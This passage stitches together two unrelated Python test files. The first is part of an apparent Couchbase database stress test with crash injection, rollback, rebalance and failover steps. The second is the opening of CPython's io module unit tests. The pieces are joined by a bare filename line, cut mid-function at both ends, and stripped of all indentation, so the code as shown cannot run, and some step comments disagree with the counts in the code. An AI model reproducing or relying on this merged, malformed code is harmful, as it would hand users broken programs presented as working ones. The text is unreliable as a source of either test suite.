create_start=self.start,
create_end=self.start + self.num_items)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
'''
fragmentation: 50, total data: 3X, stale: X
'''
#######################################################################
'''
Update Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
_iter = 0
self.update_perc = 100
self.PrintStep("Step 8: Update all %s random items %s times" %
(str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 8.%s: Update all %s random items %s times" %
(str(_iter),
str(self.num_items),
str(self.step_iterations)))
self.generate_docs(doc_ops=["update"],
update_start=self.start,
update_end=self.end)
self.perform_load(crash=False, validate_data=True)
_iter += 1
self.key_prefix = temp
if self.end_step == 8:
exit(8)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
#######################################################################
'''
Delete Random: 0 - 10M
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
self.key_prefix = "random_keys"
self.delete_perc = 100
self.PrintStep("Step 9: Delete/Re-Create all %s random items" %
str(self.num_items))
self.generate_docs(doc_ops=["delete"],
delete_start=self.start,
delete_end=self.end)
self.perform_load(crash=False, validate_data=True)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
self.generate_docs(doc_ops=["create"],
create_start=self.start,
create_end=self.end)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
if self.end_step == 9:
exit(9)
#######################################################################
'''
Update: 0 - 1M
Final Docs = 30M (0-20M, 10M Random)
'''
self.create_perc, self.read_perc, self.update_perc, self.delete_perc = [100/len(self.doc_ops)]*4
self.PrintStep("Step 10: Update %s percent(%s) items %s times and \
crash during recovery" % (str(self.update_perc),
str(self.num_items),
str(self.step_iterations)))
_iter = 0
while _iter < self.step_iterations and self.crashes:
self.PrintStep("Step 10.%s: Update %s percent(%s) items %s times \
and crash during recovery" % (str(_iter), str(self.update_perc),
str(self.num_items),
str(self.step_iterations)))
self.generate_docs(doc_ops=self.doc_ops)
self.perform_load(crash=True, validate_data=False)
_iter += 1
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=1200)
if self.end_step == 10:
exit(10)
#######################################################################
self.PrintStep("Step 11: Normal Rollback with creates")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
mem_only_items = self.input.param("rollback_items", 100000)
self.perform_rollback(self.final_items, mem_only_items,
doc_type="create")
if self.end_step == 11:
exit(11)
#######################################################################
self.PrintStep("Step 12: Normal Rollback with updates")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="update")
if self.end_step == 12:
exit(12)
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_scopes = self.num_scopes
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
drop += 1
self.num_collections = self.num_collections - drop
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.final_items = self.final_items * (self.num_collections)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(self.final_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
if self.end_step == 13:
exit(13)
#######################################################################
self.PrintStep("Step 14: Normal Rollback with deletes")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="delete")
if self.end_step == 14:
exit(14)
#######################################################################
self.PrintStep("Step 15: Normal Rollback with expiry")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="expiry")
if self.end_step == 15:
exit(15)
#######################################################################
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
if self.crashes:
self.PrintStep("Step 16: Random crashes during CRUD-Expiry")
'''
Creates: 20M-50M
Final Docs = 60M (0-50M, 10M Random)
Updates: 0M-20M
Final Docs = 60M (0-50M, 10M Random)
Deletes: 0M-20M
Final Docs = 40M (20-50M, 10M Random)
Expiry: 0M-20M , MAXTTL=5s
Final Docs = 40M (20-50M, 10M Random)
'''
self.create_perc = 300
self.update_perc = 200
self.delete_perc = 200
self.expiry_perc = 200
self.generate_docs(doc_ops="create;update;delete;expiry",
delete_start=0,
delete_end=self.num_items*self.delete_perc/100,
expire_start=0,
expire_end=self.num_items*self.expiry_perc/100)
task = self.data_load()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
self.task_manager.get_task_result(task)
self.stop_crash = True
th.join()
if self.end_step == 16:
exit(16)
#######################################################################
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
self.PrintStep("Step 17: Random crashes during CRUD-Expiry")
'''
Creates: 50M-80M
Final Docs = 90M (0-80M, 10M Random)
Updates: 0M-20M
Final Docs = 90M (0-80M, 10M Random)
Deletes: 0M-20M
Final Docs = 70M (20-90M, 10M Random)
Expiry: 0M-20M , MAXTTL=5s
Final Docs = 40M (20-50M, 10M Random)
'''
self.create_perc = 300
self.update_perc = 200
self.delete_perc = 150
self.expiry_perc = 150
self.generate_docs(doc_ops="create;update;delete;expiry")
task = self.data_load()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False,
"num_kills": 20})
th.start()
self.task_manager.get_task_result(task)
self.stop_crash = True
th.join()
if self.end_step == 17:
exit(17)
#######################################################################
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection})
self.num_collections += 1
self.sleep(0.5)
self.bucket_util.flush_all_buckets(self.cluster)
self.init_doc_params()
self.sleep(600, "Iteration %s completed successfully !!!" % self.loop)
self.loop += 1
if self.end_step == 18:
exit(18)
def SystemTestMagma(self):
#######################################################################
self.loop = 1
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
self.crash_count = 0
self.stop_rebalance = self.input.param("pause_rebalance", False)
self.crashes = self.input.param("crashes", 20)
self.PrintStep("Step 3: Create %s items sequentially" % self.num_items)
self.expiry_perc = 100
self.create_perc = 100
self.update_perc = 100
self.delete_perc = 100
self.key_prefix = "random"
self.doc_ops = self.input.param("doc_ops", ["expiry"])
self.generate_docs(doc_ops=self.doc_ops,
expire_start=0,
expire_end=self.num_items,
create_start=self.num_items,
create_end=self.num_items*2,
update_start=self.num_items*2,
update_end=self.num_items*3
)
self.perform_load(wait_for_load=False)
self.sleep(300)
while self.loop <= self.iterations:
###################################################################
self.PrintStep("Step 4: Rebalance in with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
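# Busy-wait until the crash thread has injected the configured number of crashes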
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 5: Rebalance Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=0, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 6: Rebalance In_Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=2, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 7: Swap with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 8: Failover a node and RebalanceOut that node \
with loading in parallel")
# Choose node to failover
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Failover Node
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
# Rebalance out failed over node
self.otpNodes = self.rest.node_statuses()
self.rest.rebalance(otpNodes=[otpNode.id for otpNode in self.otpNodes],
ejectedNodes=[self.chosen[0].id])
self.assertTrue(self.rest.monitorRebalance(stop_if_loop=True),
msg="Rebalance failed")
# Maintain node availability
servs_out = [node for node in self.cluster.servers
if node.ip == self.chosen[0].ip]
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.available_servers += servs_out
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 9: Failover a node and FullRecovery\
that node")
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
# Mark Node for full recovery
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="full")
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 10: Failover a node and DeltaRecovery that \
node with loading in parallel")
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="delta")
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 12: Updating the bucket replica to 2")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=2)
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 13: Updating the bucket replica to 1")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=1)
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 14: Start the entire process again")
self.loop += 1
if self.loop < self.iterations:
self.sleep(10)
if len(self.cluster.nodes_in_cluster) > self.nodes_init:
nodes_cluster = self.cluster.nodes_in_cluster[:]
nodes_cluster.remove(self.cluster.master)
servs_out = random.sample(
nodes_cluster,
int(len(self.cluster.nodes_in_cluster)
- self.nodes_init))
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], servs_out,
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(
rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.available_servers += servs_out
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.print_stats()
self.log.info("Volume Test Run Complete")
self.task_manager.abort_all_tasks()
test_io.py
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
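# A minimal illustrative sketch of that pattern (not an actual test in this
# file; the concrete tests below, e.g. BufferedReaderTest with its
# CBufferedReaderTest/PyBufferedReaderTest subclasses, follow the same shape):
#
#     class SomethingTest(unittest.TestCase):
#         def test_x(self):
#             bufio = self.tp(self.MockRawIO())  # self.tp bound per subclass
#             ...
#
#     class CSomethingTest(SomethingTest):
#         tp = io.BufferedReader    # C implementation
#
#     class PySomethingTest(SomethingTest):
#         tp = pyio.BufferedReader  # pure-Python implementation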
import os
import sys
import time
import array
import threading
import random
import unittest
import warnings
import weakref
import gc
import abc
from itertools import chain, cycle, count
from collections import deque
from test import support
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIO:
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
return b""
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
return 0
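# A None entry on the read stack simulates a raw stream that would block
# (readinto() returns None, as for a non-blocking stream with no data).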
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
self._blocker_char = None
self._write_stack.append(b[:n])
raise self.BlockingIOError(0, "test blocking", n)
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 12)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 1)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; it takes
# a long time to build the >2GB file and takes >2GB of disk space,
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
if not support.is_resource_enabled("largefile"):
print("\nTesting large file ops skipped on %s." % sys.platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
class CIOTest(IOTest):
pass
class PyIOTest(IOTest):
pass
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEquals(42, bufio.fileno())
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEquals(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEquals(b"abc", bufio.read())
def test_read(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEquals(b"abcdef", bufio.read(6))
# Invalid args
